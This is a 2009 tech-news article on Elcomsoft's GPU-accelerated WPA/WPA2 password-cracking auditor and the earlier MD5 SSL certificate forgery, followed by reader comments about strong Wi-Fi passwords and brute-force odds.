backtop


Print 65 comment(s) - last by Oregonian2.. on Jan 19 at 2:35 AM


  (Source: Elcomsoft)
Make sure your WPA/WPA2 passwords are good ones

GPU-powered general-purpose computing is causing all sorts of security nightmares these days, and wireless access points secured with WPA seem to be the latest victim. Elcomsoft, of “Advanced eBook Processor” fame, released a proprietary WPA/WPA2-PSK cracker that uses GPUs to brute force passwords in record time.

Elcomsoft claims its software can try almost 16,000 passwords per second (p/sec) with a single Radeon HD 4870, using an “advanced dictionary attack” that mutates entries from a master wordlist. Advanced hardware, such as the NVIDIA Tesla S1070 GP-GPU, raises the password rate to more than 52,000 p/sec – compared to an Intel Core 2 Quad Q6600 CPU, which clocks at 1,100 p/sec.

The program, known as the “Elcomsoft Wireless Security Auditor”, claims it was designed for network administrators and IT personnel seeking to audit internal security, as well as external penetration testers and other “white hat” hackers.

While brute-force and dictionary attacks are nothing new, Wireless Security Auditor appears to be one of the most efficient solutions available. To work, it requires a tcpdump-formatted communications dump with at least one handshake packet. Elcomsoft says all processing is done off-line, and is completely transparent to the targeted network.

HotHardware notes that the way Elcomsoft phrases its “proprietary” dictionary engine most likely means that it doesn’t use third-party programming interfaces such as OpenCL, CUDA, or Stream.

Despite the massive improvements in scalability and processing power that GPUs offer compared to regular CPUs, a full-scale brute-force attack against all but the weakest of WPA passwords is still infeasible – the amount of time required to brute-force a 10-digit password, assuming the entire ASCII character set and the same password rate, would still take a Radeon HD 4870 over 2 trillion years. Even with optimizations – such as narrowing the possibilities down to 0-9 and the upper/lower cases of the English alphabet – the number of GPUs required to crack it within a year lies in excess of 1.6 million.

Elcomsoft lists Wireless Security Auditor for $1,199, however the software it is currently priced at $599.99 until March 1, 2009.

Late last year, security researchers announced that they were able to break weak SSL certificates using the computing power of 200 PlayStation 3s over a handful of weekends. The attack only applied to SSL certificates signed with an MD5 hash, as opposed to the more-secure SHA1 or SHA2 algorithms, but its effects are devastating: once cracked, the attacker can impersonate the certificate signing authority and generate fully trusted SSL certificates for any domain, for any browser that trusts certificates signed with MD5.



Comments     Threshold


This article is over a month old, voting and posting comments is disabled

RE: Strong passwords...
By jaybuffet on 1/16/2009 8:06:44 AM , Rating: 2
What do you do if a friend comes over and wants to get on your network? That password isn't memorizable, so you have to have it as plain text somewhere. That was the issue i had when i was using keepass to generate passwords for me. I would constantly have to go back to the app to get my password. So then what happens when my hard drive fails.. now i have to do forgot password on any site i need to log on to


RE: Strong passwords...
By Oobu on 1/16/2009 8:15:42 AM , Rating: 3
I actually use a GRC password for my WIFI, and all I do is put it on a text file then copy it to a flash drive when a friend comes over. I set it up, copy and paste, they're in. Not really much fuss and I think it does an excellent job of keeping the neighbors off my connection. For most people, they'd look at mine and see "Area 52" with some ungodly password, and then look over and see two "linksys" with full on cable connections within 100 feet of me, completely wide open. -shrugs- I could disable broadcasting of the ID, but I don't really care at this point.


RE: Strong passwords...
By jonmcc33 on 1/16/2009 12:38:38 PM , Rating: 2
Text file on a USB flash drive. My bigger worry is those that run Windows XP SP2 and don't have the WPA2 patch (KB893357), because I force WPA2. So I put that on my flash drive too. If they had SP3 or Vista it wouldn't be a big deal.

But I like to remain secure, even knowing people can use software and video cards to try 16,000 dictionary words per second...you won't find my password in any dictionary. Even a brute force attempt, do the math on a 63-character randomly generated password. It would never be cracked in my lifetime.


RE: Strong passwords...
By JediJeb on 1/16/2009 2:24:22 PM , Rating: 3
quote:
Even a brute force attempt, do the math on a 63-character randomly generated password. It would never be cracked in my lifetime.


That is of course assuming that the first combination they generate isn't the exact combination you used. It is unlikely but not impossible that if I were to randomly guess a 63 character password it would be correct on the first try.


RE: Strong passwords...
By jonmcc33 on 1/16/2009 9:32:47 PM , Rating: 2
ROFL! That's just too funny. Brute force attacks are started at the lower end first and progress. A brute force would start with 1 character and continue to 2 characters and then to 3, so on and so forth. The brute force would continue on till 63 characters. At that point, after centuries have passed, I will have been long dead. You cannot randomly guess a 63-character password, period. To propose so shows you have very little experience with information security.


RE: Strong passwords...
By GaryJohnson on 1/17/2009 3:50:19 AM , Rating: 2
It's statistically more likely you'll be killed by a zombie WHILE that zombie is being struck by lightning.


"If you can find a PS3 anywhere in North America that's been on shelves for more than five minutes, I'll give you 1,200 bucks for it." -- SCEA President Jack Tretton














botimage
Copyright 2014 DailyTech LLC. - RSS Feed | Advertise | About Us | Ethics | FAQ | Terms, Conditions & Privacy Information | Kristopher Kubicki